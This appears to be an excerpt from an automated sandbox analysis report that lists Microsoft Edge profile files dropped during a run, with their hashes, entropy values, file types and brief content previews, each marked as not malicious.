                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.748 1db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/23-00:24:20.749 1db8 Recovering log #3.2024/12/23-00:24:20.752 1db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379405062517659

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1443
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.842236636005581
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:3bdyespsAF4unxKtLp3X2amEtG1ChqZfAQKkOAM4:3ZgzFcLp2FEkChi5HOp
                                                                                                                                                                                                                                                                                                  MD5:49D833AF68450BC684C024573A1F465A
                                                                                                                                                                                                                                                                                                  SHA1:04ACC27B37C0EA2A23C302D4BC7D86F61C1F8F6D
                                                                                                                                                                                                                                                                                                  SHA-256:87FE01002DDFEA5752C2629B44864A4EC04756DB334CA818BCFDDC59B0E0DFFC
                                                                                                                                                                                                                                                                                                  SHA-512:E9EC63D760050660EA2B712307C6ADA027142F392413E0B75DF6AA67258BBE7F4D56FAD05B20666F47C85AC86BAF361108B868279CEA9846D68F76C53C079AB6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SNSS.........(V.............(V......"..(V.............(V.........(V.........(V.........(V....!....(V.................................(V..(V1..,.....(V$...0d64bf1a_aef4_4228_9e6f_33c06e9c463d.....(V.........(V.................(V.....(V.........................(V....................5..0.....(V&...{98952893-68FF-4A5D-A164-705C709ED3DB}.......(V.........(V............................(V.............(V........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......kf.5.)..lf.5.).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):352
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.087432715414863
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:ub+q2P923oH+Tcwt7Uh2ghZIFUt88HrZmw+2VkwO923oH+Tcwt7Uh2gnLJ:Nv4YebIhHh2FUt88Hr/+m5LYebIhHLJ
                                                                                                                                                                                                                                                                                                  MD5:D07D7D203249388B845A8F0C41C3A2C1
                                                                                                                                                                                                                                                                                                  SHA1:A676B390BA0AEA55F13F46A6C91F4559EE2B92BD
                                                                                                                                                                                                                                                                                                  SHA-256:4BBB402F9EFD6EEEA51450854A8055FCF0B26E33179FFD704AE266D5FEC70B66
                                                                                                                                                                                                                                                                                                  SHA-512:4B56DC24EA80432CAACAC5652B1FF658693E174FC321182A61D0D31A931F3BF17032EF561A3F1F2C560B51029093E0A1EFC7C80D4EA44C2747FD297932D45F42
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.005 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/23-00:24:20.006 1b48 Recovering log #3.2024/12/23-00:24:20.015 1b48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):352
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.087432715414863
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:ub+q2P923oH+Tcwt7Uh2ghZIFUt88HrZmw+2VkwO923oH+Tcwt7Uh2gnLJ:Nv4YebIhHh2FUt88Hr/+m5LYebIhHLJ
                                                                                                                                                                                                                                                                                                  MD5:D07D7D203249388B845A8F0C41C3A2C1
                                                                                                                                                                                                                                                                                                  SHA1:A676B390BA0AEA55F13F46A6C91F4559EE2B92BD
                                                                                                                                                                                                                                                                                                  SHA-256:4BBB402F9EFD6EEEA51450854A8055FCF0B26E33179FFD704AE266D5FEC70B66
                                                                                                                                                                                                                                                                                                  SHA-512:4B56DC24EA80432CAACAC5652B1FF658693E174FC321182A61D0D31A931F3BF17032EF561A3F1F2C560B51029093E0A1EFC7C80D4EA44C2747FD297932D45F42
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.005 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/23-00:24:20.006 1b48 Recovering log #3.2024/12/23-00:24:20.015 1b48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):434
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.211185197987916
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:D9+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8jJZmw+Y9VkwO923oH+TcwtzjqEKj3N:D4v4YebvqBQFUt8jJ/+YD5LYebvqBvJ
                                                                                                                                                                                                                                                                                                  MD5:E9724DB2FA9F0C5B9F3308A3B9CDA1DA
                                                                                                                                                                                                                                                                                                  SHA1:51490F5684C689ED8A6BFE7C403DB2A762100A98
                                                                                                                                                                                                                                                                                                  SHA-256:F4AF348673CCA3A7DAB529742ADC2DDC09F80AF923B02CFF5883836EF64ABB0C
                                                                                                                                                                                                                                                                                                  SHA-512:9AADF94E8E0EF14253EEE5E770E12DA81EECD3709A3BC2FD8C87E552EC43680289B3FF523D3F5730977C2F5D3CD93CB33B4B500B295C0B38139CA38D5D129F5B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.774 1db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:24:20.775 1db8 Recovering log #3.2024/12/23-00:24:20.778 1db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):434
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.211185197987916
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:D9+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8jJZmw+Y9VkwO923oH+TcwtzjqEKj3N:D4v4YebvqBQFUt8jJ/+YD5LYebvqBvJ
                                                                                                                                                                                                                                                                                                  MD5:E9724DB2FA9F0C5B9F3308A3B9CDA1DA
                                                                                                                                                                                                                                                                                                  SHA1:51490F5684C689ED8A6BFE7C403DB2A762100A98
                                                                                                                                                                                                                                                                                                  SHA-256:F4AF348673CCA3A7DAB529742ADC2DDC09F80AF923B02CFF5883836EF64ABB0C
                                                                                                                                                                                                                                                                                                  SHA-512:9AADF94E8E0EF14253EEE5E770E12DA81EECD3709A3BC2FD8C87E552EC43680289B3FF523D3F5730977C2F5D3CD93CB33B4B500B295C0B38139CA38D5D129F5B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.774 1db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:24:20.775 1db8 Recovering log #3.2024/12/23-00:24:20.778 1db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\069aab7a-2afc-4444-b4a1-b5f6f554460c.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\2de62e1d-50a9-4192-87d1-a621aad283d5.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\7405bc26-7db9-4728-9f2a-72479703e996.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF4721f.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                  MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                  SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                  SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                  SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):422
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.224069763155392
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Xfh9+q2P923oH+TcwtzjqEKj0QMxIFUt8qkFkJZmw+qy9VkwO923oH+TcwtzjqEr:J4v4YebvqBZFUt8VyJ/+xD5LYebvqBaJ
                                                                                                                                                                                                                                                                                                  MD5:8E211CF8CE7D9584853A2422C3DAB866
                                                                                                                                                                                                                                                                                                  SHA1:2BCF6FB935D3F9BFA0AB64082FD4EDDB357C3304
                                                                                                                                                                                                                                                                                                  SHA-256:53FD71B289CC46D8B977523E8689C790F80A89C8C5E034C98570A4563F246338
                                                                                                                                                                                                                                                                                                  SHA-512:6EE659EBF5B9F4AB28F52EFCDDC423C753D9E10EF324A6A1DF6062CBB35D4530CF12AF28BC434D4DEABE3523A9E804E52C2E003CD370209CD2C669A68EECBDB0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:40.789 1db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/23-00:24:40.790 1db8 Recovering log #3.2024/12/23-00:24:40.793 1db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):422
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.224069763155392
                                                                                                                                                                                                                                                                                                  Encrypted:false
